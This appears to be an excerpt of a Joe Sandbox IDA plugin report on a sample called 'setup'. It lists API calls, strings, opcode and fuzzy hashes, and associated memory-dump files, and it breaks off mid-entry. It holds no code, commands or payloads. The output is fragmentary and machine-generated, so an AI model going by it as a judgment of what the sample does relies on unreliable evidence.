                                                                                                    Similarity
                                                                                                    • API ID: Thread$CurrentPriority
                                                                                                    • String ID:
                                                                                                    • API String ID: 1343868529-0
                                                                                                    • Opcode ID: 8f9056632ab55460ae1907c140841d29cbb4bef297ff313935ddabdf73af0d15
                                                                                                    • Instruction ID: 0ae8439004ee8ef3eb80e29c5bd904911397de5dc60a0dbf628e72e7aa8b3646
                                                                                                    • Opcode Fuzzy Hash: 8f9056632ab55460ae1907c140841d29cbb4bef297ff313935ddabdf73af0d15
                                                                                                    • Instruction Fuzzy Hash: B3E01AF1D157148BCF107F7CAD4928A7BA4BB05221F020A3AE89597251E670A8498B92
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: N2$N2d6;
                                                                                                    • API String ID: 0-892837438
                                                                                                    • Opcode ID: 2941d3da19da98c8e415e8972f075a945efb93331106d871071bd98d6267c11d
                                                                                                    • Instruction ID: e4c9e24b9ec0423e37089729863c8e6dc117316913a082de948dab57aafcb195
                                                                                                    • Opcode Fuzzy Hash: 2941d3da19da98c8e415e8972f075a945efb93331106d871071bd98d6267c11d
                                                                                                    • Instruction Fuzzy Hash: 30220F74608352CFCB18DF28C58066ABBF1FF88700F11892EE9998B365E775D855CB82
                                                                                                    APIs
                                                                                                      • Part of subcall function 00210FF1: malloc.MSVCRT ref: 00210FF5
                                                                                                    • _CIexp.MSVCRT(00000029,00000004,?,?,000001A6,?), ref: 002225ED
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Iexpmalloc
                                                                                                    • String ID: L$MIDI
                                                                                                    • API String ID: 316122613-1882826730
                                                                                                    • Opcode ID: 4f2414f9516fdcf4836c799665d6ea31f2e115b98330c9f5911923c073da9a04
                                                                                                    • Instruction ID: 44ac1dccf170ebfb62e67bcccf4d82e3f13a90a04c768a22aa9ea95f32758867
                                                                                                    • Opcode Fuzzy Hash: 4f2414f9516fdcf4836c799665d6ea31f2e115b98330c9f5911923c073da9a04
                                                                                                    • Instruction Fuzzy Hash: D302BEB1914261EFCB19CFA4E494AB9BBF4BF08300F0941AEE8496B362D735DA54CF50
                                                                                                    Strings
                                                                                                    • Unknown pseudo relocation protocol version %d., xrefs: 0025CA9D
                                                                                                    • Unknown pseudo relocation bit size %d., xrefs: 0025C93C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                                    • API String ID: 0-395989641
                                                                                                    • Opcode ID: a110f6bec4508fc87c0783796f3d9ce3fd359e4e475c423c228efc1b2078048c
                                                                                                    • Instruction ID: 70fcc99f68625edd6388d1f7671c4bbca88899d905c378cc4c91cdaa376eb85a
                                                                                                    • Opcode Fuzzy Hash: a110f6bec4508fc87c0783796f3d9ce3fd359e4e475c423c228efc1b2078048c
                                                                                                    • Instruction Fuzzy Hash: C551B4769203058FCB11CF68D88069EB7B5FB85319F35852ADD84AB316E330E919CB98
                                                                                                    APIs
                                                                                                    • GetMonitorInfoW.USER32 ref: 0024E333
                                                                                                    • SetWindowPos.USER32 ref: 0024E375
                                                                                                    • GetWindowLongW.USER32 ref: 0024E3A1
                                                                                                    • SetWindowLongW.USER32 ref: 0024E3DB
                                                                                                    • SetThreadExecutionState.KERNEL32 ref: 0024E4A7
                                                                                                    • SystemParametersInfoW.USER32 ref: 0024E4F9
                                                                                                    • SystemParametersInfoW.USER32 ref: 0024E51D
                                                                                                    • SetThreadExecutionState.KERNEL32 ref: 0024E88C
                                                                                                      • Part of subcall function 00249D60: ChangeDisplaySettingsExW.USER32 ref: 00249D98
                                                                                                    • GetWindowLongW.USER32 ref: 0024E5E0
                                                                                                    • SetWindowLongW.USER32 ref: 0024E621
                                                                                                    • SetWindowPos.USER32 ref: 0024E6E5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$Info$ExecutionParametersStateSystemThread$ChangeDisplayMonitorSettings
                                                                                                    • String ID: (
                                                                                                    • API String ID: 628194763-3887548279
                                                                                                    • Opcode ID: e859597548f303d03dbba318134e9136bc067c7a69b9ac2194959bda1821bdbc
                                                                                                    • Instruction ID: f5eb09d5484a7743c0b72119e51befac544f6cc966489f38a4fc15288a612d3c
                                                                                                    • Opcode Fuzzy Hash: e859597548f303d03dbba318134e9136bc067c7a69b9ac2194959bda1821bdbc
                                                                                                    • Instruction Fuzzy Hash: 2631FF75919B018FC748EF28D58421ABBF4FF88720F42896DE8898B315E770D894CF82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fprintf
                                                                                                    • String ID: %p not found?!?!
                                                                                                    • API String ID: 383729395-11085004
                                                                                                    • Opcode ID: c8341e5852dba081ee2bb50deba1e1a4c139d834e691df946392f80500342a01
                                                                                                    • Instruction ID: a1d391adc432bb4457107eb288dd9192bb4e7c822d98e36278c64790dfa60147
                                                                                                    • Opcode Fuzzy Hash: c8341e5852dba081ee2bb50deba1e1a4c139d834e691df946392f80500342a01
                                                                                                    • Instruction Fuzzy Hash: 0A1165B1524B118FC720AF76848D66ABBE0AF04700F19C42DD88D8B212D770D8A8CB53
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32 ref: 0025006B
                                                                                                      • Part of subcall function 0023F1D0: strcpy.MSVCRT ref: 0023F235
                                                                                                    Strings
                                                                                                    • vkCreateWin32SurfaceKHR, xrefs: 0025001A
                                                                                                    • Win32: Failed to create Vulkan surface: %s, xrefs: 002500B0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModulestrcpy
                                                                                                    • String ID: Win32: Failed to create Vulkan surface: %s$vkCreateWin32SurfaceKHR
                                                                                                    • API String ID: 122033455-2197241564
                                                                                                    • Opcode ID: a396d04cc907c668330b7fa38c7ee1ff20ff4bd2f7d9ffab8908740af538c383
                                                                                                    • Instruction ID: a956820ba28c3c37e6594fddc5cc1eae38a3c3c7712557c0dd6c012885217707
                                                                                                    • Opcode Fuzzy Hash: a396d04cc907c668330b7fa38c7ee1ff20ff4bd2f7d9ffab8908740af538c383
                                                                                                    • Instruction Fuzzy Hash: 3311BFB59183008FD740AF69E58831ABBF0EF89344F00892DF8C8A7251D775A9498F96
                                                                                                    APIs
                                                                                                      • Part of subcall function 001C5100: CreateMutexW.KERNEL32(?,?,?,?,?,?,001C71ED), ref: 001C5136
                                                                                                      • Part of subcall function 001E6B10: CloseHandle.KERNEL32 ref: 001E6B21
                                                                                                      • Part of subcall function 001E6B10: CreateThread.KERNEL32 ref: 001E6B55
                                                                                                      • Part of subcall function 001E6AE0: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,001C7228), ref: 001E6AF8
                                                                                                    • WaitForSingleObject.KERNEL32 ref: 001C7238
                                                                                                    • ReleaseMutex.KERNEL32 ref: 001C724C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateMutexObjectSingleWait$CloseHandleReleaseThread
                                                                                                    • String ID: aA
                                                                                                    • API String ID: 3302886564-2567749500
                                                                                                    • Opcode ID: 8e7b43f372419e653ec6cebcac326830b360fa503b37531d067f573911a17a79
                                                                                                    • Instruction ID: 03717ecfd28755ae2b4605ca999f3684b792cc91a4586f045c017d6b94f87735
                                                                                                    • Opcode Fuzzy Hash: 8e7b43f372419e653ec6cebcac326830b360fa503b37531d067f573911a17a79
                                                                                                    • Instruction Fuzzy Hash: A1112EB1509B04DFC300BF68E98459EBBE0ABA0350F81C91EE4C447251C778E4C4CB96
                                                                                                    APIs
                                                                                                      • Part of subcall function 0020B680: CloseHandle.KERNEL32 ref: 0020B691
                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 0032FE1C
                                                                                                      • Part of subcall function 00288490: free.MSVCRT ref: 002884A0
                                                                                                      • Part of subcall function 00288490: DeleteCriticalSection.KERNEL32 ref: 002884BA
                                                                                                      • Part of subcall function 00282C30: free.MSVCRT ref: 00282C51
                                                                                                      • Part of subcall function 00282C30: DeleteCriticalSection.KERNEL32 ref: 00282C7D
                                                                                                      • Part of subcall function 00282C30: free.MSVCRT ref: 00282C8F
                                                                                                      • Part of subcall function 00282C30: DeleteCriticalSection.KERNEL32 ref: 00282CB2
                                                                                                      • Part of subcall function 00282C30: free.MSVCRT ref: 00282CC4
                                                                                                      • Part of subcall function 00282C30: DeleteCriticalSection.KERNEL32 ref: 00282CE7
                                                                                                      • Part of subcall function 00282C30: free.MSVCRT ref: 00282CF6
                                                                                                      • Part of subcall function 00282C30: DeleteCriticalSection.KERNEL32 ref: 00282D13
                                                                                                      • Part of subcall function 00282C30: free.MSVCRT ref: 00282D22
                                                                                                      • Part of subcall function 00282C30: DeleteCriticalSection.KERNEL32 ref: 00282D3F
                                                                                                    • DeleteCriticalSection.KERNEL32(00000000), ref: 0032FDFA
                                                                                                      • Part of subcall function 00288510: free.MSVCRT ref: 00288520
                                                                                                      • Part of subcall function 00288510: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,0032F7A3), ref: 0028853A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalDeleteSection$free$CloseHandle
                                                                                                    • String ID: Pr;
                                                                                                    • API String ID: 291953313-1073677810
                                                                                                    • Opcode ID: 2258fe61475b57e854126f16c4c81e7a02893adac2d44ebfe47b86a8cbc3773f
                                                                                                    • Instruction ID: 86a5c66a3123c73750422be1006cbd5bdcca3515f5ffceab8d8798f75352e38d
                                                                                                    • Opcode Fuzzy Hash: 2258fe61475b57e854126f16c4c81e7a02893adac2d44ebfe47b86a8cbc3773f
                                                                                                    • Instruction Fuzzy Hash: E30104790287458FC764FFB0C5856AEB7E8BF84341F810C3DA58683662EB749158CF22
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                    • String ID: ClsMain
                                                                                                    • API String ID: 3013587201-395663586
                                                                                                    • Opcode ID: d29157fd8c08c1fb6baba3f5bb747aabb5f069544de9900c8d5dfb4fcf122c78
                                                                                                    • Instruction ID: c31a3ef0b29280715249256709c81e53cea1ae357ab8c236a969433825cacaeb
                                                                                                    • Opcode Fuzzy Hash: d29157fd8c08c1fb6baba3f5bb747aabb5f069544de9900c8d5dfb4fcf122c78
                                                                                                    • Instruction Fuzzy Hash: F70114B5908611CFDB00AF7DFE8879ABBF4BB04315F068538D88487261E731E804CB5A
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
